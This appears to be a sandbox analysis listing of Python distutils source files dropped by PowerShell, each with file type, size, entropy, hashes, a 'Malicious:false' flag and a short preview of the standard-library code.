                                                                                                                                                                                                            Preview:"""distutils.ccompiler....Contains CCompiler, an abstract base class that defines the interface..for the Distutils compiler abstraction model."""....import sys, os, re..from distutils.errors import *..from distutils.spawn import spawn..from distutils.file_util import move_file..from distutils.dir_util import mkpath..from distutils.dep_util import newer_group..from distutils.util import split_quoted, execute..from distutils import log....class CCompiler:.. """Abstract base class to define the interface that must be implemented.. by real compiler classes. Also has some utility methods used by.. several compiler classes..... The basic idea behind a compiler abstraction class is that each.. instance can be used for all the compile/link steps in building a.. single project. Thus, attributes common to all of those compile and.. link steps -- include directories, macros to define, libraries to link.. against, etc. -- are attributes of the compiler instance. To allow
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):18482
                                                                                                                                                                                                            Entropy (8bit):4.420065712794541
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:wRkd19MPOu97Zrws2qB2ptMW2f8Gia3XH+2lgUL2rYnU:wk1QOPG0WlZn1lBjnU
                                                                                                                                                                                                            MD5:DC00404D5BFD02B69F6346E3BA816E2B
                                                                                                                                                                                                            SHA1:2E960974130FEB23938AB22D3D626DEFE0452B48
                                                                                                                                                                                                            SHA-256:85E3FC729488F2A06EA61BC924C1BB0EFA0FD59E6BF9E8D80023C8B692D7E1E8
                                                                                                                                                                                                            SHA-512:DE152F672F95CA13DAF1E387742191EF406CC1F3DAD9DE251DA8D072F469334BDAA101CB0CFED17D4D96C8FD0B06A9852FD8FE5C3CF0138869B6D507F546992E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.cmd....Provides the Command class, the base class for the command classes..in the distutils.command package..."""....import sys, os, re..from distutils.errors import DistutilsOptionError..from distutils import util, dir_util, file_util, archive_util, dep_util..from distutils import log....class Command:.. """Abstract base class for defining command classes, the "worker bees".. of the Distutils. A useful analogy for command classes is to think of.. them as subroutines with local variables called "options". The options.. are "declared" in 'initialize_options()' and "defined" (given their.. final values, aka "finalized") in 'finalize_options()', both of which.. must be defined by every command class. The distinction between the.. two is necessary because option values might come from the outside.. world (command line, config file, ...), and any options dependent on.. other options must be computed *after* these outside influences have.. been p
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):801
                                                                                                                                                                                                            Entropy (8bit):3.8793756193152595
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:HMfFD+voM+IbtvuRDbERWTFcu1mkxl9Dsq2HQkoWXidu25nNn:HMND8Rb14WWTF51llDH2HQko4i5
                                                                                                                                                                                                            MD5:4ADAF69A02FE6869BF213304C1230552
                                                                                                                                                                                                            SHA1:9A3E926AD3E1A8DC125B57F086A3C734391CEFD7
                                                                                                                                                                                                            SHA-256:93C3197E5E648D128755360D0AEF074C3F93CA19FE1F17F4948EE3EF5C9BD524
                                                                                                                                                                                                            SHA-512:A5978533F891C20B8360D99C4198B959345B3D040F2EFA70BA264DC960CBCA0028E418110375A9272633BE4F8730DCA0B9451D4F1E34C8530DE084C96DF7E797
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command....Package containing implementation of all the standard Distutils..commands."""....__all__ = ['build',.. 'build_py',.. 'build_ext',.. 'build_clib',.. 'build_scripts',.. 'clean',.. 'install',.. 'install_lib',.. 'install_headers',.. 'install_scripts',.. 'install_data',.. 'sdist',.. 'register',.. 'bdist',.. 'bdist_dumb',.. 'bdist_rpm',.. 'check',.. 'upload',.. # These two are reserved for future use:.. #'bdist_sdux',.. #'bdist_pkgtool',.. # Note:.. # bdist_packager is not included because it only provides.. # an abstract base class.. ]..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5574
                                                                                                                                                                                                            Entropy (8bit):4.31615698701314
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:BMCFhdlUl7quJN16KK43Xb83/NmWh3h5qZ9K3RBrKig/ylTfGq/kSDtaEHkjYFDr:BfPUhquJN1hZ3r83Fl3h5qWvKi5hZkEr
                                                                                                                                                                                                            MD5:20CE297284367AE47EE96C19AD5861B0
                                                                                                                                                                                                            SHA1:8E19B5F176C4A12AA8B7BF2611B48642ED78DCFA
                                                                                                                                                                                                            SHA-256:91B7C37C34C4F264A0141474B83B1F086C5E7D5FDDF7E8F3683DB81B414F8022
                                                                                                                                                                                                            SHA-512:CDE2D6949D346719A4DA6DFAADEA9E63358DD31C8FACFB580E8CD46E2012FAF079BF97D4215EDA1392A7CA82A5D7573FA6C9FFF32B55B95B4B866953222D4144
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.bdist....Implements the Distutils 'bdist' command (create a built [binary]..distribution)."""....import os..from distutils.core import Command..from distutils.errors import *..from distutils.util import get_platform......def show_formats():.. """Print list of available formats (arguments to "--format" option)... """.. from distutils.fancy_getopt import FancyGetopt.. formats = [].. for format in bdist.format_commands:.. formats.append(("formats=" + format, None,.. bdist.format_command[format][1])).. pretty_printer = FancyGetopt(formats).. pretty_printer.print_help("List of available distribution formats:")......class bdist(Command):.... description = "create a built (binary) distribution".... user_options = [('bdist-base=', 'b',.. "temporary directory for creating built distributions"),.. ('plat-name=', 'p',.. "platform name to embed in generated filen
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5036
                                                                                                                                                                                                            Entropy (8bit):4.143738535856316
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:0seaCF2Qhv2HGS/SDWgFSbyE66rJf/D963boz0kmI:0se9WmSq43D
                                                                                                                                                                                                            MD5:2540A08F0688EF951E376EDCDA8C5DAE
                                                                                                                                                                                                            SHA1:63B44F422BC2BD63235C1F6870A93FDB35C230F8
                                                                                                                                                                                                            SHA-256:7168169D923288B8EB00F3D3038128A29B45927BCC4A3476BD2577C88007E993
                                                                                                                                                                                                            SHA-512:19F1069A95485E0D2AE2821D68E2EF3881714B59963C820BCA77AC9901BDB52FD0AE535890EBF887C9D12B34FD73CFD425BC921EF1877B8034F72A5694B00782
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.bdist_dumb....Implements the Distutils 'bdist_dumb' command (create a "dumb" built..distribution -- i.e., just an archive to be unpacked under $prefix or..$exec_prefix)."""....import os..from distutils.core import Command..from distutils.util import get_platform..from distutils.dir_util import remove_tree, ensure_relative..from distutils.errors import *..from distutils.sysconfig import get_python_version..from distutils import log....class bdist_dumb(Command):.... description = "create a \"dumb\" built distribution".... user_options = [('bdist-dir=', 'd',.. "temporary directory for creating the distribution"),.. ('plat-name=', 'p',.. "platform name to embed in generated filenames ".. "(default: %s)" % get_platform()),.. ('format=', 'f',.. "archive format to create (tar, gztar, bztar, xztar, ".. "ztar, zip)"),..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):36266
                                                                                                                                                                                                            Entropy (8bit):4.625138980344657
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:zbbvErd8dlcCRmkevmmGPfyRLlna8mu5UBM0Py3RYZWnU6XMrCo1xbUHewV:zbrBMecLlmA3Ryi8BUHpV
                                                                                                                                                                                                            MD5:A0BB9468E1B647A6B8163E634DB524C0
                                                                                                                                                                                                            SHA1:632458462508C94F49A3D599C3E8D711B7B74582
                                                                                                                                                                                                            SHA-256:A198C3979136B33B0206CD78CE47000E0E7DE55A94DB09D59356BA5B7D278CF8
                                                                                                                                                                                                            SHA-512:76D843FC0C4AB6025A267E5E94B9B361ED250B0ADE268B9A9DA6371E16393AC350B31E3792E6A02364C1B5FA910FA63D0CB4F4149D49AC7049A39F0C336A58F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# Copyright (C) 2005, 2006 Martin von L.wis..# Licensed to PSF under a Contributor Agreement..."""..Implements the bdist_msi command..."""....import os..import sys..import warnings..from distutils.core import Command..from distutils.dir_util import remove_tree..from distutils.sysconfig import get_python_version..from distutils.version import StrictVersion..from distutils.errors import DistutilsOptionError..from distutils.util import get_platform..from distutils import log..import msilib..from msilib import schema, sequence, text..from msilib import Directory, Feature, Dialog, add_data....class PyDialog(Dialog):.. """Dialog class with a fixed layout: controls at the top, then a ruler,.. then a list of buttons: back, next, cancel. Optionally a bitmap at the.. left.""".. def __init__(self, *args, **kw):.. """Dialog(database, name, x, y, w, h, attributes, title, first,.. default, cancel, bitmap=true)""".. Dialog.__init__(self, *args).. ruler = self.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):22116
                                                                                                                                                                                                            Entropy (8bit):4.4628786085869585
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:rvUYQgtDMamuyNZ8pon8S6ATTcFoDx2TEvIn:rvUYc8pon8SrPt92YvY
                                                                                                                                                                                                            MD5:86FF73EB7D0B1A6C39365CD3A4907E5C
                                                                                                                                                                                                            SHA1:4F9D23D4CBC37FE3B27855ED0FE0EF979E8DD570
                                                                                                                                                                                                            SHA-256:40801A81526E018F73D051D78F88D7A091130E85EAFBDA07E1F12013F27470F9
                                                                                                                                                                                                            SHA-512:53569DCD9FC10DC595E64CB7E1A08AF9763696D0596ED27617BE6E7AA17D771F57B201A3BC17D98E3B304E9967CB06D5F934EF7A7A8221A81F0DF979E98DEAD7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.bdist_rpm....Implements the Distutils 'bdist_rpm' command (create RPM source and binary..distributions)."""....import subprocess, sys, os..from distutils.core import Command..from distutils.debug import DEBUG..from distutils.file_util import write_file..from distutils.errors import *..from distutils.sysconfig import get_python_version..from distutils import log....class bdist_rpm(Command):.... description = "create an RPM distribution".... user_options = [.. ('bdist-base=', None,.. "base directory for creating built distributions"),.. ('rpm-base=', None,.. "base directory for creating RPMs (defaults to \"rpm\" under ".. "--bdist-base; must be specified for RPM 2)"),.. ('dist-dir=', 'd',.. "directory to put final RPM files in ".. "(and .spec files if --spec-only)"),.. ('python=', None,.. "path to Python interpreter to hard-code in the .spec file ".. "(default: \"python\")"),..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5924
                                                                                                                                                                                                            Entropy (8bit):4.383677474902082
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:/PLCFdd4tcRd4QlpC/v96dyZVOlkZ+AGg7Z5/m/i3z1KvnJWdj4t6:/POStY4+Y/v9RJJfZ5/m/+z1KvJWat6
                                                                                                                                                                                                            MD5:8B808B0B879EE7CCE411E725B95CC859
                                                                                                                                                                                                            SHA1:2180E4EA663EC98626247AA4EBEE920FA97E8F74
                                                                                                                                                                                                            SHA-256:D43053802FEAF2CB4A092BC93610D53EC46CF47F54B701A40703A9E2C08BE4B0
                                                                                                                                                                                                            SHA-512:23F3592F23E9140EA8464145EBE42D8993A73CE3A63D97C7D239F2366CAEC0357E0445EEDE2A27C15236EAD87C324B543A64745451D5553BFD36B14E524376BA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.build....Implements the Distutils 'build' command."""....import sys, os..from distutils.core import Command..from distutils.errors import DistutilsOptionError..from distutils.util import get_platform......def show_compilers():.. from distutils.ccompiler import show_compilers.. show_compilers()......class build(Command):.... description = "build everything needed to install".... user_options = [.. ('build-base=', 'b',.. "base directory for build library"),.. ('build-purelib=', None,.. "build directory for platform-neutral distributions"),.. ('build-platlib=', None,.. "build directory for platform-specific distributions"),.. ('build-lib=', None,.. "build directory for all distribution (defaults to either " +.. "build-purelib or build-platlib"),.. ('build-scripts=', None,.. "build directory for scripts"),.. ('build-temp=', 't',.. "temporary build directory"),.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8231
                                                                                                                                                                                                            Entropy (8bit):4.237942374937885
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:uVGVCFhyg5+x7IRjMYr4vGI+wyQ2wUIe1fWdv0oRt3qbNjb3qbfJdrAMNd4:uVG4nztSuIFyQ2uRJAMNW
                                                                                                                                                                                                            MD5:6D7F9F35793D0BD4C91B313D1B7417C2
                                                                                                                                                                                                            SHA1:489F326C2E59E3CD2FE1F20D49E413EC978EFEF4
                                                                                                                                                                                                            SHA-256:63D4148A9740416C5D81D5125ECAAC822EEB51805911C820925446BBF6DEFC23
                                                                                                                                                                                                            SHA-512:783B7639F58B7E537A5116D42F116F638474CD9F8061CB8FA2EA5E65B3C61B5FD54DBE144A1361CD5A8F9743A9A449A303AF0F197CD8F46EE0EBE82D9F085ADE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.build_clib....Implements the Distutils 'build_clib' command, to build a C/C++ library..that is included in the module distribution and needed by an extension..module."""......# XXX this module has *lots* of code ripped-off quite transparently from..# build_ext.py -- not surprisingly really, as the work required to build..# a static library from a collection of C source files is not really all..# that different from what's required to build a shared object file from..# a collection of C source files. Nevertheless, I haven't done the..# necessary refactoring to account for the overlap in code between the..# two modules, mainly because a number of subtle details changed in the..# cut 'n paste. Sigh.....import os..from distutils.core import Command..from distutils.errors import *..from distutils.sysconfig import customize_compiler..from distutils import log....def show_compilers():.. from distutils.ccompiler import show_compilers.. show_compilers()......class b
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32389
                                                                                                                                                                                                            Entropy (8bit):4.39529190171132
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:zsX85V9Fx2ukzz+7z1K8BRmJz2cepIU9ozVPz7zyPKOE2fcjx+4c8:zsX+xK4mJzTyPlrUkY
                                                                                                                                                                                                            MD5:79473BA1AAA024355AB55B73633B2743
                                                                                                                                                                                                            SHA1:123C96CE3679DC950531533E968DBA88F9011C99
                                                                                                                                                                                                            SHA-256:40F261DD8A47291F88F5FC5D6D2A994C88C0AC8B5826FDF5E0CA8B6E25858CB8
                                                                                                                                                                                                            SHA-512:A83CE28C39A9700D49F3638709EAA2CCBD4C740D71FA4BD694B00680C2362C9577BEEB824CAD9F632AF677E15EF090B6FF609B83050C262B3BC6A175E592748A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.build_ext....Implements the Distutils 'build_ext' command, for building extension..modules (currently limited to C extensions, should accommodate C++..extensions ASAP)."""....import contextlib..import os..import re..import sys..from distutils.core import Command..from distutils.errors import *..from distutils.sysconfig import customize_compiler, get_python_version..from distutils.sysconfig import get_config_h_filename..from distutils.dep_util import newer_group..from distutils.extension import Extension..from distutils.util import get_platform..from distutils import log....from site import USER_BASE....# An extension name is just a dot-separated list of Python NAMEs (ie...# the same as a fully-qualified module name)...extension_name_re = re.compile \.. (r'^[a-zA-Z_][a-zA-Z_0-9]*(\.[a-zA-Z_][a-zA-Z_0-9]*)*$')......def show_compilers ():.. from distutils.ccompiler import show_compilers.. show_compilers()......class build_ext(Command):.... description = "b
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17606
                                                                                                                                                                                                            Entropy (8bit):4.371782952954079
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:LRKL1zpsI1PZKCmHQYIcDkDYg0f1oY381J10Ie:LRKLtPHmHFkD3ed3mu
                                                                                                                                                                                                            MD5:13557678DEEC02D4F789CD1DC7F12B8B
                                                                                                                                                                                                            SHA1:1F600847B5D7C9E6C326E1E3C1F7879E753ACB85
                                                                                                                                                                                                            SHA-256:6AEC4CF13136C0BEF686C311CFC934339940EA2603F3540B41074CF3F6F53821
                                                                                                                                                                                                            SHA-512:AA0238784B4FC7FC47273BF545DF1069BECCD6FEC89DD9C0DA7FC83E729D5CDCCDCC23CDCC716333E6F08F990830549E872F5DFF1B86020FE24EC0A1DA0D15B3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.build_py....Implements the Distutils 'build_py' command."""....import os..import importlib.util..import sys..import glob....from distutils.core import Command..from distutils.errors import *..from distutils.util import convert_path, Mixin2to3..from distutils import log....class build_py (Command):.... description = "\"build\" pure Python modules (copy to build directory)".... user_options = [.. ('build-lib=', 'd', "directory to \"build\" (copy) to"),.. ('compile', 'c', "compile .py to .pyc"),.. ('no-compile', None, "don't compile .py files [default]"),.. ('optimize=', 'O',.. "also compile with optimization: -O1 for \"python -O\", ".. "-O2 for \"python -OO\", and -O0 to disable [default: -O0]"),.. ('force', 'f', "forcibly build everything (ignore file timestamps)"),.. ].... boolean_options = ['compile', 'force'].. negative_opt = {'no-compile' : 'compile'}.... def initialize_options(self):..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6392
                                                                                                                                                                                                            Entropy (8bit):4.111635964665241
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:uis/8WCFxCI3o14zD/79OLKMOiFA2d/5J0WOstnvXVUE3d9iwrSmrIk4lT:uxyfD/7UPvFj/f0WXlJCwrSmrIkG
                                                                                                                                                                                                            MD5:DFAFA6C288CFAE9F544DF83F3908E890
                                                                                                                                                                                                            SHA1:6B70D8BD57EDFC9B78F57E9058E7CC82F4008029
                                                                                                                                                                                                            SHA-256:3722A0E412A3A82282C86A4012B575077DE442DDE4BC7570B0FF49B889AD147C
                                                                                                                                                                                                            SHA-512:E4D31B41F233C821DF07F6ACEB775CF41D29896F8A64CC71761F01EAFFF02CD16BDD4E30FAA8B4DE325C8D19A22DB58471033EBD12D818239BD71D279D7573C7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.build_scripts....Implements the Distutils 'build_scripts' command."""....import os, re..from stat import ST_MODE..from distutils import sysconfig..from distutils.core import Command..from distutils.dep_util import newer..from distutils.util import convert_path, Mixin2to3..from distutils import log..import tokenize....# check if Python is called on the first line with this expression..first_line_re = re.compile(b'^#!.*python[0-9.]*([ \t].*)?$')....class build_scripts(Command):.... description = "\"build\" scripts (copy and fixup #! line)".... user_options = [.. ('build-dir=', 'd', "directory to \"build\" (copy) to"),.. ('force', 'f', "forcibly build everything (ignore file timestamps"),.. ('executable=', 'e', "specify final destination interpreter path"),.. ].... boolean_options = ['force']...... def initialize_options(self):.. self.build_dir = None.. self.scripts = None.. self.force = None.. self.e
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5784
                                                                                                                                                                                                            Entropy (8bit):4.346888632207922
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:TrQCFYe5/BQkQDvzLejIiV7fSQhzwU6+NFaGyGH:TfhLh8vfejIOa6z22H
                                                                                                                                                                                                            MD5:F74F108F8BA434064D8AF248AF25F6C9
                                                                                                                                                                                                            SHA1:122A9E87503166C587DECE029CA182C993261FD9
                                                                                                                                                                                                            SHA-256:7B0BF58895ABF0DD61E98E686F10E8C32EFF4ACECA62F27FD886D7D14E45191C
                                                                                                                                                                                                            SHA-512:BEAFB0A7FCE0BB3446669197D45955F6220CAFD0152BBD0FDAF872C3A0A8CA20206F6FF972FEDCB8B44B5059CEA8D83A38660B34E63E3F25177A8C4BE9E12017
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.check....Implements the Distutils 'check' command..."""..from distutils.core import Command..from distutils.errors import DistutilsSetupError....try:.. # docutils is installed.. from docutils.utils import Reporter.. from docutils.parsers.rst import Parser.. from docutils import frontend.. from docutils import nodes.... class SilentReporter(Reporter):.... def __init__(self, source, report_level, halt_level, stream=None,.. debug=0, encoding='ascii', error_handler='replace'):.. self.messages = [].. Reporter.__init__(self, source, report_level, halt_level, stream,.. debug, encoding, error_handler).... def system_message(self, level, message, *children, **kwargs):.. self.messages.append((level, message, children, kwargs)).. return nodes.system_message(message, level=level,.. type=self.levels[level],..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2852
                                                                                                                                                                                                            Entropy (8bit):4.248561340644865
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:sJFKO9MXFM024sJgBc0gBXz2vQvnVNG5F7GS:0FKO9CFH2lB8f
                                                                                                                                                                                                            MD5:F87DBE0A94577BAC57E5EB69104ADF2B
                                                                                                                                                                                                            SHA1:5E70A14C0DB4F06953C1178057F968A6880F9CFB
                                                                                                                                                                                                            SHA-256:AF74749ECFA1294E80C94FEF64045084EC89A4B136881D7AC901A6ED9B20C7BE
                                                                                                                                                                                                            SHA-512:E55E0D1366E5BDF8B5EB2C0397A79171E9D56C2915C84228ED953A16B8936B4B6C7EDF118C4B9B54F40A9C11E941BA259C4C46C5F76ED36C94785532B6F446B3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.clean....Implements the Distutils 'clean' command."""....# contributed by Bastian Kleineidam <calvin@cs.uni-sb.de>, added 2000-03-18....import os..from distutils.core import Command..from distutils.dir_util import remove_tree..from distutils import log....class clean(Command):.... description = "clean up temporary files from 'build' command".. user_options = [.. ('build-base=', 'b',.. "base build directory (default: 'build.build-base')"),.. ('build-lib=', None,.. "build directory for all modules (default: 'build.build-lib')"),.. ('build-temp=', 't',.. "temporary build directory (default: 'build.build-temp')"),.. ('build-scripts=', None,.. "build directory for scripts (default: 'build.build-scripts')"),.. ('bdist-base=', None,.. "temporary directory for built distributions"),.. ('all', 'a',.. "remove all build output, not just temporary by-products").. ].... boolean
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):666
                                                                                                                                                                                                            Entropy (8bit):4.445889248278227
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:HMZMrNErRQ3qBNMdxjlxzobRDiPQbjO6Cx2rokokoMazCqDg:HMZMZEFDnMbjzhQbrokokovzCqDg
                                                                                                                                                                                                            MD5:22AAEAC9EA49EF0B020CAE304F2F4F72
                                                                                                                                                                                                            SHA1:AB43D35A8171D98F71A3CA75CA94305C4419AC83
                                                                                                                                                                                                            SHA-256:668C99E076DFB95E014829C4028460DEE94A32B1FBB1C44116DFFBF2DC48BF5B
                                                                                                                                                                                                            SHA-512:6FC54D91C1D968BFE6D8AFF1D1339110C359340AE9C061ACBE3521D65889B4A3977033410883AD6F3E0C8E21D4AD00F8A6BFDBCEB53FF112BD59E09933CBEB07
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.x....Implements the Distutils 'x' command..."""....# created 2000/mm/dd, John Doe....__revision__ = "$Id$"....from distutils.core import Command......class x(Command):.... # Brief (40-50 characters) description of the command.. description = "".... # List of option tuples: long name, short name (None if no short.. # name), and help string... user_options = [('', '',.. ""),.. ].... def initialize_options(self):.. self. = None.. self. = None.. self. = None.... def finalize_options(self):.. if self.x is None:.. self.x = .... def run(self):..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13461
                                                                                                                                                                                                            Entropy (8bit):4.404293907666477
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:TctLbgP6Yo6xtwAfZe2uz40bHE/BHFi3w/+/Bu/Mz/7ZFrD78frwuMJaF0:TsbEo6xqAE2uk0AktXZFD78f8JJaF0
                                                                                                                                                                                                            MD5:44F319C4CB58DC7D666FE913A518E63D
                                                                                                                                                                                                            SHA1:5E3DE0D8335E00F6653B527264C95BB4001D039C
                                                                                                                                                                                                            SHA-256:FFC162DC06244CFC040085DE9A6E618337DA50E03C546886B9034D671B99656D
                                                                                                                                                                                                            SHA-512:A7EB20EDEB31A2F4BA327D7DE0162298374E39F1F1EC2B23E1F34F1E571013F514383676C3C7E028033C6A0F4B01B8297D68897529C0D811E253C0BCD3506431
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.config....Implements the Distutils 'config' command, a (mostly) empty command class..that exists mainly to be sub-classed by specific module distributions and..applications. The idea is that while every "config" command is different,..at least they're all named the same, and users always see "config" in the..list of standard commands. Also, this is a good place to put common..configure-like tasks: "try to compile this C code", or "figure out where..this header file lives"..."""....import os, re....from distutils.core import Command..from distutils.errors import DistutilsExecError..from distutils.sysconfig import customize_compiler..from distutils import log....LANG_EXT = {"c": ".c", "c++": ".cxx"}....class config(Command):.... description = "prepare to build".... user_options = [.. ('compiler=', None,.. "specify the compiler type"),.. ('cc=', None,.. "specify the compiler executable"),.. ('include-dirs=', 'I',..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):28921
                                                                                                                                                                                                            Entropy (8bit):4.47377512781044
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:ie09cfYx6CkuDXsGMHvTQWtOR+xsb2Gi6wQ7QRp6NMTtV8LEoBZs:ie0936CZiTQWtm1gtQE36wt3ors
                                                                                                                                                                                                            MD5:52A07AD675CA636E27571051F9E3192E
                                                                                                                                                                                                            SHA1:04CC26197B46254D23609F35948748E599ED76C7
                                                                                                                                                                                                            SHA-256:F990AB66D7C9BB87247FEEDA4BA0C83A5BA5F71BD31421D3D758913958D5B1D0
                                                                                                                                                                                                            SHA-512:1F0F7841E87FC5B1A69E7D28B9584C7BCDAB6BC45D11EF65F661FC3F4042DFB673C314C8415EC362EBB595D6902FDA91F514BD2B6823EFE3F277D2767C2B9354
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.install....Implements the Distutils 'install' command."""....import sys..import sysconfig..import os..import re....from distutils import log..from distutils.core import Command..from distutils.debug import DEBUG..from distutils.sysconfig import get_config_vars..from distutils.errors import DistutilsPlatformError..from distutils.file_util import write_file..from distutils.util import convert_path, subst_vars, change_root..from distutils.util import get_platform..from distutils.errors import DistutilsOptionError....from site import USER_BASE..from site import USER_SITE....HAS_USER_SITE = (USER_SITE is not None)....# The keys to an installation scheme; if any new types of files are to be..# installed, be sure to add an entry to every scheme in..# sysconfig._INSTALL_SCHEMES, and to SCHEME_KEYS here...SCHEME_KEYS = ('purelib', 'platlib', 'headers', 'scripts', 'data')....# The following code provides backward-compatible INSTALL_SCHEMES..# while making the sysconfig modul
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
